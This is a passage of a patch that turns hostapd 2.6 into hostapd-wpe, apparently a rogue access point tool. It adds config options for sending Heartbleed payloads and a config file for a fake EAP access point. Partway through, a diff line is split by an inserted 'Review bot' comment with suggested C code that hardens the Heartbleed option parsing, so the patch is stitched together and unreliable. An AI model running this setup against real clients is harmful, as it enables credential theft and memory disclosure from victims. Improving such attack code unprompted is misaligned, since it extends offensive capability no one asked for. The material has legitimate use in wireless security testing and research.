728+# 729+# This file is included in Makefile, so variables like CFLAGS and LIBS can also 730+# be modified from here. In most cass, these lines should use += in order not 731+# to override previous values of the variables. 732+ 733+# Driver interface for Host AP driver 734+CONFIG_DRIVER_HOSTAP=y 735+ 736+# Driver interface for wired authenticator 737+CONFIG_DRIVER_WIRED=y 738+ 739+# Driver interface for drivers using the nl80211 kernel interface 740+CONFIG_DRIVER_NL80211=y 741+ 742+# QCA vendor extensions to nl80211 743+CONFIG_DRIVER_NL80211_QCA=y 744+ 745+# driver_nl80211.c requires libnl. If you are compiling it yourself 746+# you may need to point hostapd to your version of libnl. 747+# 748+#CFLAGS += -I$<path to libnl include files> 749+#LIBS += -L$<path to libnl library files> 750+ 751+# Use libnl v2.0 (or 3.0) libraries. 752+#CONFIG_LIBNL20=y 753+ 754+# Use libnl 3.2 libraries (if this is selected, CONFIG_LIBNL20 is ignored) 755+CONFIG_LIBNL32=y 756+ 757+ 758+# Driver interface for FreeBSD net80211 layer (e.g., Atheros driver) 759+#CONFIG_DRIVER_BSD=y 760+#CFLAGS += -I/usr/local/include 761+#LIBS += -L/usr/local/lib 762+#LIBS_p += -L/usr/local/lib 763+#LIBS_c += -L/usr/local/lib 764+ 765+# Driver interface for no driver (e.g., RADIUS server only) 766+#CONFIG_DRIVER_NONE=y 767+ 768+# IEEE 802.11F/IAPP 769+CONFIG_IAPP=y 770+ 771+# WPA2/IEEE 802.11i RSN pre-authentication 772+CONFIG_RSN_PREAUTH=y 773+ 774+# PeerKey handshake for Station to Station Link (IEEE 802.11e DLS) 775+CONFIG_PEERKEY=y 776+ 777+# IEEE 802.11w (management frame protection) 778+CONFIG_IEEE80211W=y 779+ 780+# Integrated EAP server 781+CONFIG_EAP=y 782+ 783+# EAP Re-authentication Protocol (ERP) in integrated EAP server 784+CONFIG_ERP=y 785+ 786+# EAP-MD5 for the integrated EAP server 787+CONFIG_EAP_MD5=y 788+ 789+# EAP-TLS for the integrated EAP server 790+CONFIG_EAP_TLS=y 791+ 792+# EAP-MSCHAPv2 for the integrated EAP server 793+CONFIG_EAP_MSCHAPV2=y 794+ 795+# EAP-PEAP for the integrated 
EAP server 796+CONFIG_EAP_PEAP=y 797+ 798+# EAP-GTC for the integrated EAP server 799+CONFIG_EAP_GTC=y 800+ 801+# EAP-TTLS for the integrated EAP server 802+CONFIG_EAP_TTLS=y 803+ 804+# EAP-SIM for the integrated EAP server 805+CONFIG_EAP_SIM=y 806+ 807+# EAP-AKA for the integrated EAP server 808+CONFIG_EAP_AKA=y 809+ 810+# EAP-AKA' for the integrated EAP server 811+# This requires CONFIG_EAP_AKA to be enabled, too. 812+CONFIG_EAP_AKA_PRIME=y 813+ 814+# EAP-PAX for the integrated EAP server 815+CONFIG_EAP_PAX=y 816+ 817+# EAP-PSK for the integrated EAP server (this is _not_ needed for WPA-PSK) 818+CONFIG_EAP_PSK=y 819+ 820+# EAP-pwd for the integrated EAP server (secure authentication with a password) 821+CONFIG_EAP_PWD=y 822+ 823+# EAP-SAKE for the integrated EAP server 824+CONFIG_EAP_SAKE=y 825+ 826+# EAP-GPSK for the integrated EAP server 827+CONFIG_EAP_GPSK=y 828+# Include support for optional SHA256 cipher suite in EAP-GPSK 829+CONFIG_EAP_GPSK_SHA256=y 830+ 831+# EAP-FAST for the integrated EAP server 832+# Note: If OpenSSL is used as the TLS library, OpenSSL 1.0 or newer is needed 833+# for EAP-FAST support. Older OpenSSL releases would need to be patched, e.g., 834+# with openssl-0.9.8x-tls-extensions.patch, to add the needed functions. 835+CONFIG_EAP_FAST=y 836+ 837+# Wi-Fi Protected Setup (WPS) 838+CONFIG_WPS=y 839+# Enable UPnP support for external WPS Registrars 840+CONFIG_WPS_UPNP=y 841+# Enable WPS support with NFC config method 842+CONFIG_WPS_NFC=y 843+ 844+# EAP-IKEv2 845+CONFIG_EAP_IKEV2=y 846+ 847+# Trusted Network Connect (EAP-TNC) 848+CONFIG_EAP_TNC=y 849+ 850+# EAP-EKE for the integrated EAP server 851+#CONFIG_EAP_EKE=y 852+ 853+# PKCS#12 (PFX) support (used to read private key and certificate file from 854+# a file that usually has extension .p12 or .pfx) 855+CONFIG_PKCS12=y 856+ 857+# RADIUS authentication server. This provides access to the integrated EAP 858+# server from external hosts using RADIUS. 
859+CONFIG_RADIUS_SERVER=y 860+ 861+# Build IPv6 support for RADIUS operations 862+CONFIG_IPV6=y 863+ 864+# IEEE Std 802.11r-2008 (Fast BSS Transition) 865+CONFIG_IEEE80211R=y 866+ 867+# Use the hostapd's IEEE 802.11 authentication (ACL), but without 868+# the IEEE 802.11 Management capability (e.g., FreeBSD/net80211) 869+CONFIG_DRIVER_RADIUS_ACL=y 870+ 871+# IEEE 802.11n (High Throughput) support 872+CONFIG_IEEE80211N=y 873+ 874+# Wireless Network Management (IEEE Std 802.11v-2011) 875+# Note: This is experimental and not complete implementation. 876+CONFIG_WNM=y 877+ 878+# IEEE 802.11ac (Very High Throughput) support 879+CONFIG_IEEE80211AC=y 880+ 881+# Remove debugging code that is printing out debug messages to stdout. 882+# This can be used to reduce the size of the hostapd considerably if debugging 883+# code is not needed. 884+#CONFIG_NO_STDOUT_DEBUG=y 885+ 886+# Add support for writing debug log to a file: -f /tmp/hostapd.log 887+# Disabled by default. 888+#CONFIG_DEBUG_FILE=y 889+ 890+# Add support for sending all debug messages (regardless of debug verbosity) 891+# to the Linux kernel tracing facility. This helps debug the entire stack by 892+# making it easy to record everything happening from the driver up into the 893+# same file, e.g., using trace-cmd. 894+#CONFIG_DEBUG_LINUX_TRACING=y 895+ 896+# Remove support for RADIUS accounting 897+#CONFIG_NO_ACCOUNTING=y 898+ 899+# Remove support for RADIUS 900+#CONFIG_NO_RADIUS=y 901+ 902+# Remove support for VLANs 903+#CONFIG_NO_VLAN=y 904+ 905+# Enable support for fully dynamic VLANs. This enables hostapd to 906+# automatically create bridge and VLAN interfaces if necessary. 907+#CONFIG_FULL_DYNAMIC_VLAN=y 908+ 909+# Use netlink-based kernel API for VLAN operations instead of ioctl() 910+# Note: This requires libnl 3.1 or newer. 
911+#CONFIG_VLAN_NETLINK=y 912+ 913+# Remove support for dumping internal state through control interface commands 914+# This can be used to reduce binary size at the cost of disabling a debugging 915+# option. 916+#CONFIG_NO_DUMP_STATE=y 917+ 918+# Enable tracing code for developer debugging 919+# This tracks use of memory allocations and other registrations and reports 920+# incorrect use with a backtrace of call (or allocation) location. 921+#CONFIG_WPA_TRACE=y 922+# For BSD, comment out these. 923+#LIBS += -lexecinfo 924+#LIBS_p += -lexecinfo 925+#LIBS_c += -lexecinfo 926+ 927+# Use libbfd to get more details for developer debugging 928+# This enables use of libbfd to get more detailed symbols for the backtraces 929+# generated by CONFIG_WPA_TRACE=y. 930+#CONFIG_WPA_TRACE_BFD=y 931+# For BSD, comment out these. 932+#LIBS += -lbfd -liberty -lz 933+#LIBS_p += -lbfd -liberty -lz 934+#LIBS_c += -lbfd -liberty -lz 935+ 936+# hostapd depends on strong random number generation being available from the 937+# operating system. os_get_random() function is used to fetch random data when 938+# needed, e.g., for key generation. On Linux and BSD systems, this works by 939+# reading /dev/urandom. It should be noted that the OS entropy pool needs to be 940+# properly initialized before hostapd is started. This is important especially 941+# on embedded devices that do not have a hardware random number generator and 942+# may by default start up with minimal entropy available for random number 943+# generation. 944+# 945+# As a safety net, hostapd is by default trying to internally collect 946+# additional entropy for generating random data to mix in with the data 947+# fetched from the OS. This by itself is not considered to be very strong, but 948+# it may help in cases where the system pool is not initialized properly. 
949+# However, it is very strongly recommended that the system pool is initialized 950+# with enough entropy either by using hardware assisted random number 951+# generator or by storing state over device reboots. 952+# 953+# hostapd can be configured to maintain its own entropy store over restarts to 954+# enhance random number generation. This is not perfect, but it is much more 955+# secure than using the same sequence of random numbers after every reboot. 956+# This can be enabled with -e<entropy file> command line option. The specified 957+# file needs to be readable and writable by hostapd. 958+# 959+# If the os_get_random() is known to provide strong random data (e.g., on 960+# Linux/BSD, the board in question is known to have reliable source of random 961+# data from /dev/urandom), the internal hostapd random pool can be disabled. 962+# This will save some in binary size and CPU use. However, this should only be 963+# considered for builds that are known to be used on devices that meet the 964+# requirements described above. 965+#CONFIG_NO_RANDOM_POOL=y 966+ 967+# Should we use poll instead of select? Select is used by default. 968+#CONFIG_ELOOP_POLL=y 969+ 970+# Should we use epoll instead of select? Select is used by default. 971+#CONFIG_ELOOP_EPOLL=y 972+ 973+# Should we use kqueue instead of select? Select is used by default. 974+#CONFIG_ELOOP_KQUEUE=y 975+ 976+# Select TLS implementation 977+# openssl = OpenSSL (default) 978+# gnutls = GnuTLS 979+# internal = Internal TLSv1 implementation (experimental) 980+# none = Empty template 981+#CONFIG_TLS=openssl 982+ 983+# TLS-based EAP methods require at least TLS v1.0. Newer version of TLS (v1.1) 984+# can be enabled to get a stronger construction of messages when block ciphers 985+# are used. 986+CONFIG_TLSV11=y 987+ 988+# TLS-based EAP methods require at least TLS v1.0. Newer version of TLS (v1.2) 989+# can be enabled to enable use of stronger crypto algorithms. 
990+CONFIG_TLSV12=y 991+ 992+# If CONFIG_TLS=internal is used, additional library and include paths are 993+# needed for LibTomMath. Alternatively, an integrated, minimal version of 994+# LibTomMath can be used. See beginning of libtommath.c for details on benefits 995+# and drawbacks of this option. 996+#CONFIG_INTERNAL_LIBTOMMATH=y 997+#ifndef CONFIG_INTERNAL_LIBTOMMATH 998+#LTM_PATH=/usr/src/libtommath-0.39 999+#CFLAGS += -I$(LTM_PATH) 1000+#LIBS += -L$(LTM_PATH) 1001+#LIBS_p += -L$(LTM_PATH) 1002+#endif 1003+# At the cost of about 4 kB of additional binary size, the internal LibTomMath 1004+# can be configured to include faster routines for exptmod, sqr, and div to 1005+# speed up DH and RSA calculation considerably 1006+CONFIG_INTERNAL_LIBTOMMATH_FAST=y 1007+ 1008+# Interworking (IEEE 802.11u) 1009+# This can be used to enable functionality to improve interworking with 1010+# external networks. 1011+CONFIG_INTERWORKING=y 1012+ 1013+# Hotspot 2.0 1014+CONFIG_HS20=y 1015+ 1016+# Enable SQLite database support in hlr_auc_gw, EAP-SIM DB, and eap_user_file 1017+CONFIG_SQLITE=y 1018+ 1019+# Enable Fast Session Transfer (FST) 1020+CONFIG_FST=y 1021+ 1022+# Enable CLI commands for FST testing 1023+#CONFIG_FST_TEST=y 1024+ 1025+# Testing options 1026+# This can be used to enable some testing options (see also the example 1027+# configuration file) that are really useful only for testing clients that 1028+# connect to this hostapd. These options allow, for example, to drop a 1029+# certain percentage of probe requests or auth/(re)assoc frames. 1030+# 1031+#CONFIG_TESTING_OPTIONS=y 1032+ 1033+# Automatic Channel Selection 1034+# This will allow hostapd to pick the channel automatically when channel is set 1035+# to "acs_survey" or "0". Eventually, other ACS algorithms can be added in 1036+# similar way. 
1037+# 1038+# Automatic selection is currently only done through initialization, later on 1039+# we hope to do background checks to keep us moving to more ideal channels as 1040+# time goes by. ACS is currently only supported through the nl80211 driver and 1041+# your driver must have survey dump capability that is filled by the driver 1042+# during scanning. 1043+# 1044+# You can customize the ACS survey algorithm with the hostapd.conf variable 1045+# acs_num_scans. 1046+# 1047+# Supported ACS drivers: 1048+# * ath9k 1049+# * ath5k 1050+# * ath10k 1051+# 1052+# For more details refer to: 1053+# http://wireless.kernel.org/en/users/Documentation/acs 1054+# 1055+CONFIG_ACS=y 1056+ 1057+# Multiband Operation support 1058+# These extentions facilitate efficient use of multiple frequency bands 1059+# available to the AP and the devices that may associate with it. 1060+CONFIG_MBO=y 1061+ 1062+# Client Taxonomy 1063+# Has the AP retain the Probe Request and (Re)Association Request frames from 1064+# a client, from which a signature can be produced which can identify the model 1065+# of client device like "Nexus 6P" or "iPhone 5s". 
1066+CONFIG_TAXONOMY=y
1067diff -rupN hostapd-2.6/hostapd/config_file.c hostapd-2.6-wpe/hostapd/config_file.c
1068--- hostapd-2.6/hostapd/config_file.c 2016-10-02 20:51:11.000000000 +0200
1069+++ hostapd-2.6-wpe/hostapd/config_file.c 2018-05-21 11:37:58.859577170 +0200
1070@@ -20,7 +20,7 @@
1071 #include "ap/wpa_auth.h"
1072 #include "ap/ap_config.h"
1073 #include "config_file.h"
1074-
1075+#include "wpe/wpe.h"
1076
1077 #ifndef CONFIG_NO_RADIUS
1078 #ifdef EAP_SERVER
1079@@ -2108,6 +2108,22 @@ static int hostapd_config_fill(struct ho
1080 return 1;
1081 }
1082 wpa_printf(MSG_DEBUG, "eapol_version=%d", bss->eapol_version);
1083+#if OPENSSL_VERSION_NUMBER < 0x10100000L
1084+ } else if (os_strcmp(buf, "wpe_logfile") == 0) {
1085+ wpe_conf.wpe_logfile = os_strdup(pos);
1086+ } else if (os_strcmp(buf, "wpe_hb_send_before_handshake") == 0) {
1087+ wpe_conf.wpe_hb_send_before_handshake = atoi(pos);
1088+ } else if (os_strcmp(buf, "wpe_hb_send_before_appdata") == 0) {
1089+ wpe_conf.wpe_hb_send_before_appdata = atoi(pos);
1090+ } else if (os_strcmp(buf, "wpe_hb_send_after_appdata") == 0) {
1091+ wpe_conf.wpe_hb_send_after_appdata = atoi(pos);
1092+ } else if (os_strcmp(buf, "wpe_hb_payload_size") == 0) {
1093+ wpe_conf.wpe_hb_payload_size = atoi(pos);
1094+ } else if (os_strcmp(buf, "wpe_hb_num_repeats") == 0) {
1095+ wpe_conf.wpe_hb_num_repeats = atoi(pos);
1096+ } else if (os_strcmp(buf, "wpe_hb_num_tries") == 0) {
1097+ wpe_conf.wpe_hb_num_tries = atoi(pos);
1098+#endif /* #if OPENSSL_VERSION_NUMBER < 0x10100000L */
1099 #ifdef EAP_SERVER
1100 } else if (os_strcmp(buf, "eap_authenticator") == 0) {
1101 bss->eap_server = atoi(pos);
1102diff -rupN hostapd-2.6/hostapd/defconfig hostapd-2.6-wpe/hostapd/defconfig
1103--- hostapd-2.6/hostapd/defconfig 2016-10-02 20:51:11.000000000 +0200
1104+++ hostapd-2.6-wpe/hostapd/defconfig 2018-05-21 11:37:58.859577170 +0200
1105@@ -148,14 +148,14 @@ CONFIG_IPV6=y
1106 #CONFIG_DRIVER_RADIUS_ACL=y
1107
1108 # IEEE 802.11n (High
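Review bot: The new `wpe_hb_payload_size`, `wpe_hb_num_repeats` and `wpe_hb_num_tries` branches store the raw `atoi(pos)` result with no range check, although the hostapd-wpe.conf added by this same patch documents all three as 0-65535 and the surrounding options in this function reject bad values with `return 1` (as the `eapol_version` check just above the hunk does); a negative or oversized value from the config file should be refused at parse time rather than carried into the TLS code. The `wpe_logfile` branch also never checks `os_strdup()` for NULL and, if the key appears twice, overwrites the earlier pointer without freeing it (whether that field starts out NULL or points at a literal default is not visible here, so check wpe/wpe.h before adding an `os_free()`). The `#if OPENSSL_VERSION_NUMBER < 0x10100000L` guard only behaves as intended if `<openssl/opensslv.h>` is already visible in this translation unit, presumably via the new `wpe/wpe.h` include; an undefined macro evaluates to 0 in `#if`, which would compile these branches unconditionally. hostapd_config_fill begins and ends outside the hunk.
```c
	} else if (os_strcmp(buf, "wpe_logfile") == 0) {
		wpe_conf.wpe_logfile = os_strdup(pos);
		if (wpe_conf.wpe_logfile == NULL)
			return 1;
	/* … unchanged: wpe_hb_send_before_handshake / _before_appdata / _after_appdata … */
	} else if (os_strcmp(buf, "wpe_hb_payload_size") == 0) {
		int val = atoi(pos);
		if (val < 0 || val > 65535) {
			wpa_printf(MSG_ERROR, "Line %d: invalid wpe_hb_payload_size %d",
				   line, val);
			return 1;
		}
		wpe_conf.wpe_hb_payload_size = val;
	/* … same 0..65535 check for wpe_hb_num_repeats and wpe_hb_num_tries … */
```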
Throughput) support
1109-#CONFIG_IEEE80211N=y
1110+CONFIG_IEEE80211N=y
1111
1112 # Wireless Network Management (IEEE Std 802.11v-2011)
1113 # Note: This is experimental and not complete implementation.
1114 #CONFIG_WNM=y
1115
1116 # IEEE 802.11ac (Very High Throughput) support
1117-#CONFIG_IEEE80211AC=y
1118+CONFIG_IEEE80211AC=y
1119
1120 # Remove debugging code that is printing out debug messages to stdout.
1121 # This can be used to reduce the size of the hostapd considerably if debugging
1122diff -rupN hostapd-2.6/hostapd/hostapd-wpe.conf hostapd-2.6-wpe/hostapd/hostapd-wpe.conf
1123--- hostapd-2.6/hostapd/hostapd-wpe.conf 1970-01-01 01:00:00.000000000 +0100
1124+++ hostapd-2.6-wpe/hostapd/hostapd-wpe.conf 2018-05-21 11:37:58.859577170 +0200
1125@@ -0,0 +1,2042 @@
1126+# Configuration file for hostapd-wpe
1127+
1128+# Interface - Probably wlan0 for 802.11, eth0 for wired
1129+interface=wlan0
1130+
1131+# May have to change these depending on build location
1132+eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
1133+ca_cert=/etc/hostapd-wpe/ca.pem
1134+server_cert=/etc/hostapd-wpe/server.pem
1135+private_key=/etc/hostapd-wpe/server.key
1136+private_key_passwd=whatever
1137+dh_file=/etc/hostapd-wpe/dh
1138+
1139+# 802.11 Options
1140+ssid=hostapd-wpe
1141+channel=1
1142+
1143+# WPE Options - Dont need to change these to make it all work
1144+#
1145+# wpe_logfile=somefile # (Default: ./hostapd-wpe.log)
1146+# wpe_hb_send_before_handshake=0 # Heartbleed True/False (Default: 1)
1147+# wpe_hb_send_before_appdata=0 # Heartbleed True/False (Default: 0)
1148+# wpe_hb_send_after_appdata=0 # Heartbleed True/False (Default: 0)
1149+# wpe_hb_payload_size=0 # Heartbleed 0-65535 (Default: 50000)
1150+# wpe_hb_num_repeats=0 # Heartbleed 0-65535 (Default: 1)
1151+# wpe_hb_num_tries=0 # Heartbleed 0-65535 (Default: 1)
1152+
1153+
1154+# Dont mess with unless you know what you're doing
1155+eap_server=1
1156+eap_fast_a_id=101112131415161718191a1b1c1d1e1f
1157+eap_fast_a_id_info=hostapd-wpe 1158+eap_fast_prov=3 1159+ieee8021x=1 1160+pac_key_lifetime=604800 1161+pac_key_refresh_time=86400 1162+pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f 1163+wpa=2 1164+wpa_key_mgmt=WPA-EAP 1165+wpa_pairwise=CCMP 1166+rsn_pairwise=CCMP 1167+ 1168+############################################################################## 1169+# Everything below this line is pretty much the standard hostapd.conf 1170+############################################################################### 1171+ 1172+##### hostapd configuration file ############################################## 1173+# Empty lines and lines starting with # are ignored 1174+ 1175+# AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for 1176+# management frames with the Host AP driver); wlan0 with many nl80211 drivers 1177+# Note: This attribute can be overridden by the values supplied with the '-i' 1178+# command line parameter. 1179+#interface=wlan0 1180+ 1181+# In case of atheros and nl80211 driver interfaces, an additional 1182+# configuration parameter, bridge, may be used to notify hostapd if the 1183+# interface is included in a bridge. This parameter is not used with Host AP 1184+# driver. If the bridge parameter is not set, the drivers will automatically 1185+# figure out the bridge interface (assuming sysfs is enabled and mounted to 1186+# /sys) and this parameter may not be needed. 1187+# 1188+# For nl80211, this parameter can be used to request the AP interface to be 1189+# added to the bridge automatically (brctl may refuse to do this before hostapd 1190+# has been started to change the interface mode). If needed, the bridge 1191+# interface is also created. 1192+#bridge=br0 1193+ 1194+# Driver interface type (hostap/wired/none/nl80211/bsd); 1195+# default: hostap). nl80211 is used with all Linux mac80211 drivers. 1196+# Use driver=none if building hostapd as a standalone RADIUS server that does 1197+# not control any wireless/wired driver. 
1198+# driver=hostap 1199+ 1200+# Driver interface parameters (mainly for development testing use) 1201+# driver_params=<params> 1202+ 1203+# hostapd event logger configuration 1204+# 1205+# Two output method: syslog and stdout (only usable if not forking to 1206+# background). 1207+# 1208+# Module bitfield (ORed bitfield of modules that will be logged; -1 = all 1209+# modules): 1210+# bit 0 (1) = IEEE 802.11 1211+# bit 1 (2) = IEEE 802.1X 1212+# bit 2 (4) = RADIUS 1213+# bit 3 (8) = WPA 1214+# bit 4 (16) = driver interface 1215+# bit 5 (32) = IAPP 1216+# bit 6 (64) = MLME 1217+# 1218+# Levels (minimum value for logged events): 1219+# 0 = verbose debugging 1220+# 1 = debugging 1221+# 2 = informational messages 1222+# 3 = notification 1223+# 4 = warning 1224+# 1225+logger_syslog=-1 1226+logger_syslog_level=2 1227+logger_stdout=-1 1228+logger_stdout_level=2 1229+ 1230+# Interface for separate control program. If this is specified, hostapd 1231+# will create this directory and a UNIX domain socket for listening to requests 1232+# from external programs (CLI/GUI, etc.) for status information and 1233+# configuration. The socket file will be named based on the interface name, so 1234+# multiple hostapd processes/interfaces can be run at the same time if more 1235+# than one interface is used. 1236+# /var/run/hostapd is the recommended directory for sockets and by default, 1237+# hostapd_cli will use it when trying to connect with hostapd. 1238+ctrl_interface=/var/run/hostapd 1239+ 1240+# Access control for the control interface can be configured by setting the 1241+# directory to allow only members of a group to use sockets. This way, it is 1242+# possible to run hostapd as root (since it needs to change network 1243+# configuration and open raw sockets) and still allow GUI/CLI components to be 1244+# run as non-root users. However, since the control interface can be used to 1245+# change the network configuration, this access needs to be protected in many 1246+# cases. 
By default, hostapd is configured to use gid 0 (root). If you 1247+# want to allow non-root users to use the contron interface, add a new group 1248+# and change this value to match with that group. Add users that should have 1249+# control interface access to this group. 1250+# 1251+# This variable can be a group name or gid. 1252+#ctrl_interface_group=wheel 1253+ctrl_interface_group=0 1254+ 1255+ 1256+##### IEEE 802.11 related configuration ####################################### 1257+ 1258+# SSID to be used in IEEE 802.11 management frames 1259+#ssid=test 1260+# Alternative formats for configuring SSID 1261+# (double quoted string, hexdump, printf-escaped string) 1262+#ssid2="test" 1263+#ssid2=74657374 1264+#ssid2=P"hello\nthere" 1265+ 1266+# UTF-8 SSID: Whether the SSID is to be interpreted using UTF-8 encoding 1267+#utf8_ssid=1 1268+ 1269+# Country code (ISO/IEC 3166-1). Used to set regulatory domain. 1270+# Set as needed to indicate country in which device is operating. 1271+# This can limit available channels and transmit power. 1272+#country_code=US 1273+ 1274+# Enable IEEE 802.11d. This advertises the country_code and the set of allowed 1275+# channels and transmit power levels based on the regulatory limits. The 1276+# country_code setting must be configured with the correct country for 1277+# IEEE 802.11d functions. 1278+# (default: 0 = disabled) 1279+#ieee80211d=1 1280+ 1281+# Enable IEEE 802.11h. This enables radar detection and DFS support if 1282+# available. DFS support is required on outdoor 5 GHz channels in most countries 1283+# of the world. This can be used only with ieee80211d=1. 1284+# (default: 0 = disabled) 1285+#ieee80211h=1 1286+ 1287+# Add Power Constraint element to Beacon and Probe Response frames 1288+# This config option adds Power Constraint element when applicable and Country 1289+# element is added. Power Constraint element is required by Transmit Power 1290+# Control. This can be used only with ieee80211d=1. 
1291+# Valid values are 0..255. 1292+#local_pwr_constraint=3 1293+ 1294+# Set Spectrum Management subfield in the Capability Information field. 1295+# This config option forces the Spectrum Management bit to be set. When this 1296+# option is not set, the value of the Spectrum Management bit depends on whether 1297+# DFS or TPC is required by regulatory authorities. This can be used only with 1298+# ieee80211d=1 and local_pwr_constraint configured. 1299+#spectrum_mgmt_required=1 1300+ 1301+# Operation mode (a = IEEE 802.11a (5 GHz), b = IEEE 802.11b (2.4 GHz), 1302+# g = IEEE 802.11g (2.4 GHz), ad = IEEE 802.11ad (60 GHz); a/g options are used 1303+# with IEEE 802.11n (HT), too, to specify band). For IEEE 802.11ac (VHT), this 1304+# needs to be set to hw_mode=a. When using ACS (see channel parameter), a 1305+# special value "any" can be used to indicate that any support band can be used. 1306+# This special case is currently supported only with drivers with which 1307+# offloaded ACS is used. 1308+# Default: IEEE 802.11b 1309+hw_mode=g 1310+ 1311+# Channel number (IEEE 802.11) 1312+# (default: 0, i.e., not set) 1313+# Please note that some drivers do not use this value from hostapd and the 1314+# channel will need to be configured separately with iwconfig. 1315+# 1316+# If CONFIG_ACS build option is enabled, the channel can be selected 1317+# automatically at run time by setting channel=acs_survey or channel=0, both of 1318+# which will enable the ACS survey based algorithm. 1319+#channel=1 1320+ 1321+# ACS tuning - Automatic Channel Selection 1322+# See: http://wireless.kernel.org/en/users/Documentation/acs 1323+# 1324+# You can customize the ACS survey algorithm with following variables: 1325+# 1326+# acs_num_scans requirement is 1..100 - number of scans to be performed that 1327+# are used to trigger survey data gathering of an underlying device driver. 
1328+# Scans are passive and typically take a little over 100ms (depending on the 1329+# driver) on each available channel for given hw_mode. Increasing this value 1330+# means sacrificing startup time and gathering more data wrt channel 1331+# interference that may help choosing a better channel. This can also help fine 1332+# tune the ACS scan time in case a driver has different scan dwell times. 1333+# 1334+# acs_chan_bias is a space-separated list of <channel>:<bias> pairs. It can be 1335+# used to increase (or decrease) the likelihood of a specific channel to be 1336+# selected by the ACS algorithm. The total interference factor for each channel 1337+# gets multiplied by the specified bias value before finding the channel with 1338+# the lowest value. In other words, values between 0.0 and 1.0 can be used to 1339+# make a channel more likely to be picked while values larger than 1.0 make the 1340+# specified channel less likely to be picked. This can be used, e.g., to prefer 1341+# the commonly used 2.4 GHz band channels 1, 6, and 11 (which is the default 1342+# behavior on 2.4 GHz band if no acs_chan_bias parameter is specified). 1343+# 1344+# Defaults: 1345+#acs_num_scans=5 1346+#acs_chan_bias=1:0.8 6:0.8 11:0.8 1347+ 1348+# Channel list restriction. This option allows hostapd to select one of the 1349+# provided channels when a channel should be automatically selected. 
1350+# Channel list can be provided as range using hyphen ('-') or individual 1351+# channels can be specified by space (' ') separated values 1352+# Default: all channels allowed in selected hw_mode 1353+#chanlist=100 104 108 112 116 1354+#chanlist=1 6 11-13 1355+ 1356+# Beacon interval in kus (1.024 ms) (default: 100; range 15..65535) 1357+beacon_int=100 1358+ 1359+# DTIM (delivery traffic information message) period (range 1..255): 1360+# number of beacons between DTIMs (1 = every beacon includes DTIM element) 1361+# (default: 2) 1362+dtim_period=2 1363+ 1364+# Maximum number of stations allowed in station table. New stations will be 1365+# rejected after the station table is full. IEEE 802.11 has a limit of 2007 1366+# different association IDs, so this number should not be larger than that. 1367+# (default: 2007) 1368+max_num_sta=255 1369+ 1370+# RTS/CTS threshold; -1 = disabled (default); range -1..65535 1371+# If this field is not included in hostapd.conf, hostapd will not control 1372+# RTS threshold and 'iwconfig wlan# rts <val>' can be used to set it. 1373+rts_threshold=-1 1374+ 1375+# Fragmentation threshold; -1 = disabled (default); range -1, 256..2346 1376+# If this field is not included in hostapd.conf, hostapd will not control 1377+# fragmentation threshold and 'iwconfig wlan# frag <val>' can be used to set 1378+# it. 1379+fragm_threshold=-1 1380+ 1381+# Rate configuration 1382+# Default is to enable all rates supported by the hardware. This configuration 1383+# item allows this list be filtered so that only the listed rates will be left 1384+# in the list. If the list is empty, all rates are used. This list can have 1385+# entries that are not in the list of rates the hardware supports (such entries 1386+# are ignored). The entries in this list are in 100 kbps, i.e., 11 Mbps = 110. 1387+# If this item is present, at least one rate have to be matching with the rates 1388+# hardware supports. 
1389+# default: use the most common supported rate setting for the selected 1390+# hw_mode (i.e., this line can be removed from configuration file in most 1391+# cases) 1392+#supported_rates=10 20 55 110 60 90 120 180 240 360 480 540 1393+ 1394+# Basic rate set configuration 1395+# List of rates (in 100 kbps) that are included in the basic rate set. 1396+# If this item is not included, usually reasonable default set is used. 1397+#basic_rates=10 20 1398+#basic_rates=10 20 55 110 1399+#basic_rates=60 120 240 1400+ 1401+# Short Preamble 1402+# This parameter can be used to enable optional use of short preamble for 1403+# frames sent at 2 Mbps, 5.5 Mbps, and 11 Mbps to improve network performance. 1404+# This applies only to IEEE 802.11b-compatible networks and this should only be 1405+# enabled if the local hardware supports use of short preamble. If any of the 1406+# associated STAs do not support short preamble, use of short preamble will be 1407+# disabled (and enabled when such STAs disassociate) dynamically. 1408+# 0 = do not allow use of short preamble (default) 1409+# 1 = allow use of short preamble 1410+#preamble=1 1411+ 1412+# Station MAC address -based authentication 1413+# Please note that this kind of access control requires a driver that uses 1414+# hostapd to take care of management frame processing and as such, this can be 1415+# used with driver=hostap or driver=nl80211, but not with driver=atheros. 1416+# 0 = accept unless in deny list 1417+# 1 = deny unless in accept list 1418+# 2 = use external RADIUS server (accept/deny lists are searched first) 1419+macaddr_acl=0 1420+ 1421+# Accept/deny lists are read from separate files (containing list of 1422+# MAC addresses, one per line). Use absolute path name to make sure that the 1423+# files can be read on SIGHUP configuration reloads. 1424+#accept_mac_file=/etc/hostapd.accept 1425+#deny_mac_file=/etc/hostapd.deny 1426+ 1427+# IEEE 802.11 specifies two authentication algorithms. 
hostapd can be 1428+# configured to allow both of these or only one. Open system authentication 1429+# should be used with IEEE 802.1X. 1430+# Bit fields of allowed authentication algorithms: 1431+# bit 0 = Open System Authentication 1432+# bit 1 = Shared Key Authentication (requires WEP) 1433+auth_algs=3 1434+ 1435+# Send empty SSID in beacons and ignore probe request frames that do not 1436+# specify full SSID, i.e., require stations to know SSID. 1437+# default: disabled (0) 1438+# 1 = send empty (length=0) SSID in beacon and ignore probe request for 1439+# broadcast SSID 1440+# 2 = clear SSID (ASCII 0), but keep the original length (this may be required 1441+# with some clients that do not support empty SSID) and ignore probe 1442+# requests for broadcast SSID 1443+ignore_broadcast_ssid=0 1444+ 1445+# Do not reply to broadcast Probe Request frames from unassociated STA if there 1446+# is no room for additional stations (max_num_sta). This can be used to 1447+# discourage a STA from trying to associate with this AP if the association 1448+# would be rejected due to maximum STA limit. 1449+# Default: 0 (disabled) 1450+#no_probe_resp_if_max_sta=0 1451+ 1452+# Additional vendor specific elements for Beacon and Probe Response frames 1453+# This parameter can be used to add additional vendor specific element(s) into 1454+# the end of the Beacon and Probe Response frames. The format for these 1455+# element(s) is a hexdump of the raw information elements (id+len+payload for 1456+# one or more elements) 1457+#vendor_elements=dd0411223301 1458+ 1459+# Additional vendor specific elements for (Re)Association Response frames 1460+# This parameter can be used to add additional vendor specific element(s) into 1461+# the end of the (Re)Association Response frames. 
